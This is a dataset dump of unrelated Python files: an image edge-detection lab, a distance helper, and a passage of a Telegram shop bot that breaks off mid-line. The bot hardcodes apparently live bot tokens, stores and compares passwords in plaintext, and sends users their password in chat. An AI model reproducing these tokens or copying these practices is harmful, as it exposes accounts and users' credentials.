log_kernel = get_LoG(sigma)\n laplacian = convolution(img, log_kernel)\n\n else:\n laplacian = non_linear_laplacian(gaussian)\n\n crossings = zero_crossings(laplacian)\n (xs, ys) = np.gradient(gaussian)\n grad = np.sqrt(np.square(xs)+np.square(ys))\n I_max = grad.max()\n return ((grad > theta*I_max) & (crossings == 1.0)).astype(np.float)\n\n# returns real edges of image without noise\n# dilation - erosion\ndef real_edges(img, theta):\n kern = np.array([\n [0, 1, 0],\n [1, 1, 1],\n [0, 1, 0]\n ], dtype=np.uint8)\n dilated_img = cv2.dilate(img, kern)\n eroded_img = cv2.erode(img, kern)\n frontier = dilated_img - eroded_img\n return frontier > theta\n\n# returns rating for our edge detection based on real edges of image.\ndef rating(found, real):\n # D and T (where D set of edges found from us and T set of real edges)\n intersection = found.astype(bool) & real.astype(bool)\n inter_sum = intersection.sum() # card(D and T)\n found_sum = found.sum() # card(D)\n real_sum = real.sum() # card(T)\n small = np.exp(-10)\n prdt = inter_sum/(real_sum+small)\n prtd = inter_sum/(found_sum+small)\n return (prdt+prtd)/2\n\ndef search_best_rating(noisy, linear, real_edge):\n sigma_end = 10.0\n sigma_step = 0.1\n theta_end = 1.0\n theta_step = 0.01\n best_rating = sigma_i = theta_i = 0\n for sigma in np.arange(0.0000000000000000000001, sigma_end, sigma_step):\n for theta in np.arange(0.0000000000000000000001, theta_end, theta_step):\n new_rating = rating(edge_detection(noisy, sigma, theta, linear), real_edge)\n if new_rating > best_rating:\n best_rating = new_rating\n sigma_i = sigma\n theta_i = theta\n print(best_rating, sigma_i, theta_i)\n edge = edge_detection(noisy, sigma_i, theta_i, True)\n plt.imshow(edge, cmap='gray')\n plt.show()\n\n\nif __name__ == '__main__':\n\n image = 'edgetest_10.png'\n # read image\n img = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n img = img.astype(np.float) / 255\n\n # display the image\n plt.imshow(img, cmap='gray')\n plt.show()\n\n # put noise in image\n noisy_20 = noise(img, 0, 20)\n plt.imshow(noisy_20, cmap='gray')\n plt.show()\n noisy_10 = noise(img, 
0, 10)\n plt.imshow(noisy_10, cmap='gray')\n plt.show()\n\n \n # find and show real edges\n real_edge = real_edges(img, 0.15)\n plt.imshow(real_edge, cmap='gray')\n plt.show()\n\n\n\n # find best edges for linear laplacian of image\n # for PSNR=20dB\n search_best_rating(noisy_20, True, real_edge)\n '''\n # for PSNR=10dB\n search_best_rating(noisy_10, True, real_edge)\n\n # find best edges for non linear laplacian of image\n # for PSNR=20dB\n search_best_rating(noisy_20, False, real_edge)\n\n # for PSNR=10dB\n search_best_rating(noisy_10, False, real_edge)\n '''\n image = 'coffee.jpg'\n # read image\n img = cv2.imread(image, cv2.IMREAD_GRAYSCALE)\n img = img.astype(np.float) / 255\n color_img = cv2.imread(image, cv2.IMREAD_COLOR)\n color_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB)\n # display the image\n #plt.imshow(color_img)\n #plt.show()\n # edge detection\n edge = edge_detection(img, 2, 0.015, True)\n plt.imshow(edge, cmap='gray')\n plt.show()\n","repo_name":"michalakos/ComputerVision","sub_path":"lab1/code/lab1_1.py","file_name":"lab1_1.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"15093189187","text":"import os\nfrom scipy.spatial.distance import cdist\n\n\ndef compute_distance(embeddings1, embeddings2, audio_folder, image_folder):\n audio_files = os.listdir(audio_folder) if os.path.isdir(audio_folder) else []\n image_files = os.listdir(image_folder) if os.path.isdir(image_folder) else []\n\n distance_dict = {}\n\n for i in range(len(embeddings2)):\n audio_file = os.path.basename(audio_files[i]) if i < len(audio_files) else None\n image_file = os.path.basename(image_files[i]) if i < len(image_files) else None\n distance = cdist([embeddings1], [embeddings2[i]], metric='euclidean')[0][0]\n distance_dict[audio_file] = {\n 'image_file': image_file,\n 'distance': distance\n }\n\n return distance_dict\n\n\n\n\n\n\n\n","repo_name":"mariasanruiz/Pipeline-DistanceMetric","sub_path":"distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23551070973","text":"import asyncio\nimport logging\nimport sys\nfrom aiogram import Bot, Dispatcher, Router, types\nfrom aiogram.enums import ParseMode\nfrom aiogram.filters import Command\nfrom aiogram.types import Message, CallbackQuery\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.types import InlineKeyboardButton, KeyboardButton, InlineKeyboardMarkup, CallbackQuery, ReplyKeyboardMarkup\nfrom aiogram.types.web_app_info import WebAppInfo\nfrom aiogram import F\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\nfrom aiogram.methods.send_message import SendMessage\n\nfrom states import *\nfrom db import *\nfrom texts import *\n\n\n# test - 6748840687:AAEah69Bw4LUvpc43bcGA_Hr19_u98TZiJo\n# production - 6565334685:AAFMrkMnbIAB_x8DjHx9494idO8N0qCcoAs\nTOKEN = '6565334685:AAFMrkMnbIAB_x8DjHx9494idO8N0qCcoAs'\n\ndp = Dispatcher()\n\n\n@dp.callback_query(Login.input_login, F.data == \"back\")\n@dp.callback_query(Misc.misc, F.data == \"back\")\n@dp.callback_query(MakeOrder.choose_product, F.data == \"back\")\n@dp.callback_query(TrackOrder.choose_order, F.data == \"back\")\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"back\")\n@dp.callback_query(PaymentMethods.payment_methods, F.data == \"back\")\n@dp.callback_query(CreateAccount.get_name_and_surname,\n F.data == \"back\")\nasync 
def start_command(callback: types.CallbackQuery, state: FSMContext):\n await state.set_state(StartState.start_state)\n kb = InlineKeyboardBuilder()\n kb.adjust(1)\n login_button = InlineKeyboardButton(text=\"Войти\", callback_data=\"login\")\n create_account_button = InlineKeyboardButton(text=\"Создать аккаунт\", callback_data=\"create account\")\n\n create_order_button = InlineKeyboardButton(text=\"Создать заказ\", callback_data=\"create order\")\n track_order_button = InlineKeyboardButton(text=\"Отследить заказ\", callback_data=\"track order\")\n logout_button = InlineKeyboardButton(text=\"Выйти из аккаунта\", callback_data=\"logout\")\n get_contacts = InlineKeyboardButton(text=\"Контакты\", callback_data=\"get contacts\")\n check_status = InlineKeyboardButton(text=\"Узнать статус заказа\", callback_data=\"check status\")\n check_availability = InlineKeyboardButton(text=\"Узнать наличие\", callback_data=\"check availability\")\n how_to_search = InlineKeyboardButton(text=\"Как найти товар\", callback_data=\"how to search\")\n grafik_raboty = InlineKeyboardButton(text=\"График работы\", callback_data=\"grafik raboty\")\n how_to_get = InlineKeyboardButton(text=\"Как добраться\", callback_data=\"how to get\")\n delivery_methods = InlineKeyboardButton(text=\"Способы доставки\", callback_data=\"delivery methods\")\n payment_methods = InlineKeyboardButton(text=\"Способы оплаты\", callback_data=\"payment methods\")\n\n if check_chat_id_in_db(callback.from_user.id):\n if check_authorisation(callback.from_user.id):\n authorised_buttons = [create_order_button, track_order_button, check_status, check_availability,\n how_to_search, how_to_get, grafik_raboty, delivery_methods, payment_methods, logout_button, get_contacts]\n for button in authorised_buttons:\n kb.add(button)\n else:\n kb.add(login_button)\n else:\n buttons = [login_button, create_account_button]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await callback.message.answer(text='Привет, я бот магазина centrmag, выберите желаемое '\n 'действие', reply_markup=kb.as_markup())\n\n\n@dp.message(Command('start'))\nasync def start_command(message: types.Message, state: FSMContext):\n await state.set_state(StartState.start_state)\n kb = InlineKeyboardBuilder()\n kb.adjust(1)\n login_button = InlineKeyboardButton(text=\"Войти\", callback_data=\"login\")\n create_account_button = InlineKeyboardButton(text=\"Создать аккаунт\", callback_data=\"create account\")\n\n create_order_button = InlineKeyboardButton(text=\"Создать заказ\", callback_data=\"create order\")\n track_order_button = InlineKeyboardButton(text=\"Отследить заказ\", callback_data=\"track order\")\n logout_button = InlineKeyboardButton(text=\"Выйти из аккаунта\", callback_data=\"logout\")\n get_contacts = InlineKeyboardButton(text=\"Контакты\", callback_data=\"get contacts\")\n check_status = InlineKeyboardButton(text=\"Узнать статус заказа\", callback_data=\"check status\")\n check_availability = InlineKeyboardButton(text=\"Узнать наличие\", callback_data=\"check availability\")\n how_to_search = InlineKeyboardButton(text=\"Как найти товар\", callback_data=\"how to search\")\n grafik_raboty = InlineKeyboardButton(text=\"График работы\", callback_data=\"grafik raboty\")\n how_to_get = InlineKeyboardButton(text=\"Как добраться\", callback_data=\"how to get\")\n delivery_methods = InlineKeyboardButton(text=\"Способы доставки\", callback_data=\"delivery methods\")\n payment_methods = InlineKeyboardButton(text=\"Способы оплаты\", callback_data=\"payment methods\")\n\n if 
check_chat_id_in_db(message.from_user.id):\n if check_authorisation(message.from_user.id):\n authorised_buttons = [create_order_button, track_order_button, check_status, check_availability,\n how_to_search, how_to_get, grafik_raboty, delivery_methods, payment_methods, logout_button, get_contacts]\n for button in authorised_buttons:\n kb.add(button)\n else:\n kb.add(login_button)\n else:\n buttons = [login_button, create_account_button]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await message.answer(text='Привет, я бот магазина centrmag, выберите желаемое '\n 'действие', reply_markup=kb.as_markup())\n\n\ndef create_kb():\n kb = InlineKeyboardBuilder()\n cancel_button = InlineKeyboardButton(text=\"Назад\", callback_data=f'back')\n kb.add(cancel_button)\n return kb\n\n\n@dp.callback_query(F.data == \"create account\")\nasync def create_account(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=\"Введите свои имя и фамилию через пробел\",\n reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_name_and_surname)\n\n\n@dp.message(CreateAccount.get_name_and_surname)\nasync def get_name_and_surname(message: Message, state: FSMContext):\n flag = False\n kb = create_kb()\n try:\n name, surname = message.text.split(' ')\n flag = True\n except Exception as ex:\n print(ex)\n await message.answer(text=\"Введите два слова: имя и фамилию через пробел\",\n reply_markup=kb.as_markup())\n if flag:\n await state.update_data(name=name)\n await state.update_data(surname=surname)\n await message.answer(text=\"Введите свою электронную почту\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_email)\n else:\n await state.set_state(CreateAccount.get_name_and_surname)\n\n\n@dp.callback_query(CreateAccount.get_email, F.data == \"back\")\nasync def back_to_name_and_surname(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_name_and_surname)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ имя и фамилию\", reply_markup=kb.as_markup())\n\n\n@dp.message(CreateAccount.get_email)\nasync def get_email(message: Message, state: FSMContext):\n print(await state.get_state())\n kb = create_kb()\n await state.update_data(email=message.text)\n await message.answer(text=\"Введите свой номер телефона\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_phone)\n\n\n@dp.callback_query(CreateAccount.get_phone, F.data == \"back\")\nasync def back_to_email(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_email)\n print(await state.get_state())\n kb = create_kb()\n await callback.message.answer(text=\"Введите свою ИСПРАВЛЕННУЮ электронную почту\", reply_markup=kb.as_markup())\n\n\n@dp.message(CreateAccount.get_phone)\nasync def get_phone(message: Message, state: FSMContext):\n kb = create_kb()\n await state.update_data(phone_number=message.text)\n await message.answer(text=\"Придумайте пароль\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password)\n\n\n@dp.callback_query(CreateAccount.get_password, F.data == \"back\")\nasync def back_to_phone(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_phone)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ номер телефона\", reply_markup=kb.as_markup())\n\n\n# @dp.callback_query(F.data == \"back\", 
CreateAccount.get_password)\n@dp.message(CreateAccount.get_password)\nasync def get_password(message: Message, state: FSMContext):\n kb = create_kb()\n await state.update_data(password=message.text)\n await message.answer(text=\"Введите пароль еще раз\", reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password_again)\n\n\n@dp.callback_query(CreateAccount.get_password_again, F.data == \"back\")\nasync def back_to_password(callback: CallbackQuery, state: FSMContext):\n await state.set_state(CreateAccount.get_password)\n kb = create_kb()\n await callback.message.answer(text=\"Введите свой ИСПРАВЛЕННЫЙ пароль\", reply_markup=kb.as_markup())\n\n\n@dp.callback_query(F.data == \"back\", CreateAccount.get_password_again)\n@dp.message(CreateAccount.get_password_again)\nasync def get_password_again(message: Message, state: FSMContext):\n data = await state.get_data()\n kb = create_kb()\n password = data['password']\n if message.text != password:\n await message.answer(text=\"Пароли не совпадают. Попробуйте еще раз\",\n reply_markup=kb.as_markup())\n await state.set_state(CreateAccount.get_password_again)\n else:\n data_list = [data[key] for key in data.keys()]\n data_list.insert(0, message.from_user.id)\n print(data_list)\n register_user(data_list, message.from_user.id)\n await message.answer(text=\"Аккаунт создан\")\n await start_command(message, state)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"login\")\nasync def login(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n if callback.data == \"login\":\n await callback.message.answer(text=\"Введите свой email\", reply_markup=kb.as_markup())\n await state.set_state(Login.input_login)\n\n\n@dp.message(Login.input_login)\nasync def input_login(message: Message, state: FSMContext):\n login = message.text\n kb = create_kb()\n if check_login_in_db(login):\n await state.update_data(login=login)\n await message.answer(text=\"Введите пароль\", reply_markup=kb.as_markup())\n await state.set_state(Login.input_password)\n else:\n await message.answer(text=f\"Введенный логин {login} не был найден. Введите еще раз\",\n reply_markup=kb.as_markup())\n await state.set_state(Login.input_login)\n\n\n@dp.callback_query(Login.input_password, F.data == \"back\")\nasync def back_to_input_login(callback: CallbackQuery, state: FSMContext):\n await state.set_state(Login.input_login)\n kb = create_kb()\n await callback.message.answer(text=\"Введите почту еще раз\", reply_markup=kb.as_markup())\n\n\n@dp.message(Login.input_password)\nasync def input_password(message: Message, state: FSMContext):\n kb = create_kb()\n entered_password = message.text\n data = await state.get_data()\n login = data['login']\n actual_password = get_password_by_email(login)\n\n if entered_password != actual_password:\n await message.answer(text=\"Неверный пароль, попробуйте снова\", reply_markup=kb.as_markup())\n else:\n set_authorised(message.from_user.id)\n await message.answer(text=\"Вход успешный\")\n await start_command(message, state)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"get contacts\")\nasync def get_contacts(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n information = \"\"\"Вот наши контакты:\\n\\n +7 495 374 67 62\n\n+7 800 707 21 74\n\ninfo@centrmag.ru\n\nфакс: +7 499 713 52 39\nРозничный магазин: 125464, Россия, Москва, Пятницкое шоссе, д. 7, к. 
1\n\nВремя работы:\n\nПН-ПТ 9:00-19:00\"\"\"\n await callback.message.answer(text=information, reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(StartState.start_state, F.data == \"create order\")\nasync def create_order(callback: CallbackQuery, state: FSMContext):\n email, password = get_login_and_password_by_id(callback.from_user.id)\n kb = create_kb()\n kb.add(InlineKeyboardButton(text=\"Перейти в веб-приложение\", web_app=WebAppInfo(url='https://www.centrmag.ru/')))\n await callback.message.answer(text=f\"Для оформления заказа вы можете перейти на сайт \"\n f\"https://www.centrmag.ru/\\n\\nДанные для входа:\\nЛогин: {email}\\nПароль: \"\n f\"{password}\\n\\nДля создания тестового заказа введите /order и следуйте инструкциям\",\n reply_markup=kb.as_markup())\n await state.set_state(MakeOrder.choose_product)\n\n\n@dp.message(MakeOrder.choose_product, Command(\"order\"))\nasync def secret_create_order(message: Message, state: FSMContext):\n text = \"Доступные товары:\\n\"\n for i in range(1, 6):\n info = get_info_about_product(i)\n text += f\"\\n\\n{i} {info[1]}, цена: {info[2]}, категория: {info[-1]}\"\n await message.answer(text=text)\n await message.answer(\n text=\"Введите заказ в следующем формате: Товар1(id) - количество1, Товар2(id) - количество2... итд\")\n await state.set_state(MakeOrder.create_order)\n\n\n@dp.message(MakeOrder.create_order)\nasync def secret_push_order(message: Message, state: FSMContext):\n items = message.text.split(', ')\n order_id = create_order_in_db(message.from_user.id, \"paid\")\n order_sum = 0\n for item in items:\n product_id, quantity = item.split(' - ')\n price = int(get_product_price_by_id(product_id))\n summa = price * int(quantity)\n order_sum += summa\n insert_order_item(order_id, product_id, quantity, summa)\n push_order_sum(order_id, order_sum)\n await message.answer(text=f\"Заказ создан! 
ID заказа: {order_id}, чтобы посмотреть детали, нажмите на кнопку \"\n f\"'Отследить заказы на главном меню'\\n\\n Нажмите /start\")\n\n\n@dp.callback_query(StartState.start_state, F.data == \"track order\")\n@dp.callback_query(TrackOrder.track_order, F.data == \"back\")\nasync def choose_order(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n orders = get_orders_by_chat_id(callback.from_user.id)\n if not orders:\n await state.set_state(TrackOrder.choose_order)\n await callback.message.answer(text=\"У вас пока нет заказов, вы можете оформить их в разделе 'Создать заказ'\",\n reply_markup=kb.as_markup())\n else:\n await state.update_data(orders=orders)\n for order in orders:\n order_date = order[1].split(' ')[0]\n order_button = InlineKeyboardButton(text=f\"№{order[0]} от {order_date} на сумму {order[-1]} руб\",\n callback_data=f\"order: {order[0]}\")\n kb.add(order_button)\n kb.adjust(1)\n await callback.message.answer(text=\"Выберите заказ из предложенного снизу или введите номер заказа\",\n reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.choose_order)\n\n\n@dp.callback_query(TrackOrder.choose_order)\nasync def track_order(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n order_id = int(callback.data.split(': ')[1])\n order_info = get_info_about_order(order_id)\n order_statuses = {\"new\": \"Новый\", \"paid\": \"Оплаченный\"}\n text = f\"Заказ № {order_id}\\nДата: {order_info[1]}\\nСтатус: {order_statuses[order_info[2]]}\\nСумма заказа: {order_info[-1]} руб\\n\\nДетали:\\n\\n\"\n\n order_items = get_items_by_order_id(order_id)\n for item in order_items:\n item_name, item_quantity, item_summa = item\n text += f\"Товар: {item_name}\\nКоличество: {item_quantity}\\nИтого за товар: {item_summa} руб\\n\\n\"\n\n await callback.message.answer(text=text, reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.track_order)\n\n\n@dp.message(TrackOrder.choose_order)\nasync def m_choose_order(message: Message, state: FSMContext):\n order_id = int(message.text)\n data = await state.get_data()\n flag = False\n for order in data['orders']:\n if order_id == order[0]:\n flag = True\n break\n if not flag:\n await message.answer(text=f\"Заказа с номером {order_id} нет, попробуйте еще раз\")\n await state.set_state(TrackOrder.choose_order)\n else:\n await state.update_data(order_id=order_id)\n await state.set_state(TrackOrder.track_order)\n await m_track_order(message, state)\n\n\n@dp.message(TrackOrder.track_order)\nasync def m_track_order(message: Message, state: FSMContext):\n data = await state.get_data()\n order_id = data['order_id']\n kb = create_kb()\n order_info = get_info_about_order(order_id)\n order_statuses = {\"new\": \"Новый\", \"paid\": \"Оплаченный\"}\n text = f\"Заказ № {order_id}\\nДата: {order_info[1]}\\nСтатус: {order_statuses[order_info[2]]}\\nСумма заказа: {order_info[-1]} руб\\n\\nДетали:\\n\\n\"\n\n order_items = get_items_by_order_id(order_id)\n for item in order_items:\n item_name, item_quantity, item_summa = item\n text += f\"Товар: {item_name}\\nКоличество: {item_quantity}\\nИтого за товар: {item_summa} руб\\n\\n\"\n\n await message.answer(text=text, reply_markup=kb.as_markup())\n await state.set_state(TrackOrder.track_order)\n\n\n@dp.callback_query(F.data == \"logout\")\nasync def logout(callback: CallbackQuery, state: FSMContext):\n yes_button = KeyboardButton(text='Да')\n cancel_button = KeyboardButton(text='Отмена')\n btns = [[yes_button], [cancel_button]]\n kb = ReplyKeyboardMarkup(resize_keyboard=True, keyboard=btns)\n 
await callback.message.answer(\"Вы точно хотите выйти из аккаунта?\", reply_markup=kb)\n await state.set_state(Logout.confirm_logout)\n\n\n@dp.message(Logout.confirm_logout)\nasync def choose_quantity(message: Message, state: FSMContext):\n if message.text == \"Да\":\n set_unauthorised(message.from_user.id)\n await message.answer('Выход успешный', reply_markup=types.ReplyKeyboardRemove())\n else:\n await message.answer('Выход отменен', reply_markup=types.ReplyKeyboardRemove())\n await start_command(message, state)\n\n\n@dp.callback_query(F.data == \"check status\")\nasync def check_status(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n order_number = InlineKeyboardButton(text=\"Указать номер заказа\", callback_data=\"input order number\")\n fio = InlineKeyboardButton(text=\"Указать ФИО\", callback_data=\"input fio\")\n kb.add(order_number)\n kb.add(fio)\n kb.adjust(1)\n await callback.message.answer(text=\"Укажите номер заказа или ФИО, на кого оформлен заказ\",\n reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(CheckStatus.input_order_number, F.data == \"back\")\nasync def back_to_check_status(callback: CallbackQuery, state: FSMContext):\n await check_status(callback, state)\n\n\n@dp.callback_query(CheckStatus.input_fio, F.data == \"back\")\nasync def back_to_check_status(callback: CallbackQuery, state: FSMContext):\n await check_status(callback, state)\n\n\n@dp.callback_query(F.data == \"input order number\")\nasync def input_order_number(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите номер заказа\", reply_markup=kb.as_markup())\n await state.set_state(CheckStatus.input_order_number)\n\n\n@dp.callback_query(F.data == \"input fio\")\nasync def input_fio(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите ФИО\", reply_markup=kb.as_markup())\n await state.set_state(CheckStatus.input_fio)\n\n\n@dp.callback_query(F.data == \"check availability\")\nasync def check_availability(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(\"Введите артикул товара\", reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(F.data == \"how to search\")\nasync def how_to_search(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n buttons = [\n InlineKeyboardButton(text=\"Быстрый поиск по наименованию товара\", callback_data=\"quick search by name\"),\n InlineKeyboardButton(text=\"Поиск по наименованию товара\", callback_data=\"search by name\"),\n InlineKeyboardButton(text=\"Быстрый поиск по артикулу товара\", callback_data=\"quick search by vendor\"),\n InlineKeyboardButton(text=\"Поиск по артикулу товара\", callback_data=\"search by vendor\"),\n InlineKeyboardButton(text=\"Поиск по автору книги\", callback_data=\"search by author\"),\n InlineKeyboardButton(text=\"Поиск по ISBN\", callback_data=\"search by isbn\")]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n\n await callback.message.answer(\"О том, как искать товар можно ознакомиться на сайте: \"\n \"https://www.centrmag.ru/information_pages/poisk/\\n\\nТакже вы можете посмотреть, \"\n \"как искать товар по способам поиска, нажав на соответствующую кнопку\",\n reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(HowToSearch.how_to_search)\nasync def back_to_how_to_search(callback: CallbackQuery, state: FSMContext):\n await how_to_search(callback, 
state)\n\n\n@dp.callback_query(F.data == \"quick search by name\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_01.png\",\n caption=quick_search_by_name_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by name\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_02.png\",\n caption=search_by_name_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"quick search by vendor\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_01_.png\",\n caption=quick_search_by_vendor_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by vendor\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_02_.png\",\n caption=search_by_vendor_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by author\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_03.png\",\n caption=search_by_author_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"search by isbn\")\nasync def quick_search_by_name(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo=\"https://www.centrmag.ru/img/help_03.png\",\n caption=search_by_isbn_text,\n reply_markup=kb.as_markup())\n await state.set_state(HowToSearch.how_to_search)\n\n\n@dp.callback_query(F.data == \"grafik raboty\")\nasync def grafik_raboty(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=grafik_raboty_text, parse_mode=ParseMode.HTML, reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(F.data == \"how to get\")\nasync def how_to_get(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n buttons = [\n InlineKeyboardButton(text=\"От станции метро Волоколамская\", callback_data=\"from metro\"),\n InlineKeyboardButton(text=\"От станции МЦД-2 Волоколамская\", callback_data=\"from mcd\"),\n InlineKeyboardButton(text=\"Доехать на автобусе\", callback_data=\"by bus\")]\n for button in buttons:\n kb.add(button)\n kb.adjust(1)\n await callback.message.answer_photo(photo=\"https://imgur.com/a/5FSxMfP\", reply_markup=kb.as_markup())\n await state.set_state(Misc.misc)\n\n\n@dp.callback_query(HowToGet.how_to_get)\nasync def back_to_how_to_get(callback: CallbackQuery, state: FSMContext):\n await how_to_get(callback, state)\n\n\n@dp.callback_query(F.data == \"from metro\")\nasync def from_metro(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=from_metro_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"from 
mcd\")\nasync def from_mcd(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=from_mcd_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"by bus\")\nasync def by_bus(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=by_bus_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(HowToGet.how_to_get)\n\n\n@dp.callback_query(F.data == \"delivery methods\")\nasync def delivery_methods(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n for i, method in enumerate(delivery_methods_list):\n kb.add(InlineKeyboardButton(text=method, callback_data=str(i)))\n kb.adjust(1)\n await callback.message.answer(text=delivery_methods_text, parse_mode=ParseMode.HTML, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.delivery_methods)\n\n\n@dp.callback_query(DeliveryMethods.method, F.data == \"back\")\nasync def back_to_delivery_methods(callback: CallbackQuery, state: FSMContext):\n await delivery_methods(callback, state)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"0\")\nasync def samovivoz(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=samovivoz_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"1\")\nasync def pvz_i_postamaty(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo='https://imgur.com/a/LRsILZY', caption=pvz_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"2\")\nasync def kurierskaya(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer_photo(photo='https://imgur.com/a/40UlmiC')\n await callback.message.answer(text=kurierskaya_text, reply_markup=kb.as_markup())\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"3\")\nasync def beskontaktnaya_kurierskaya(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=beskontaktnaya_kurierskaya_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"4\")\nasync def punkti_samovivoza(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=punkti_samovivoza_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"5\")\nasync def kurierskaya_po_vsei_rossii(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=kurierskaya_po_vsei_rossii_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML)\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(DeliveryMethods.delivery_methods, F.data == \"6\")\nasync def po_pochte(callback: CallbackQuery, state: FSMContext):\n kb = create_kb()\n await callback.message.answer(text=po_pochte_text, reply_markup=kb.as_markup(), parse_mode=ParseMode.HTML, )\n await state.set_state(DeliveryMethods.method)\n\n\n@dp.callback_query(F.data == 
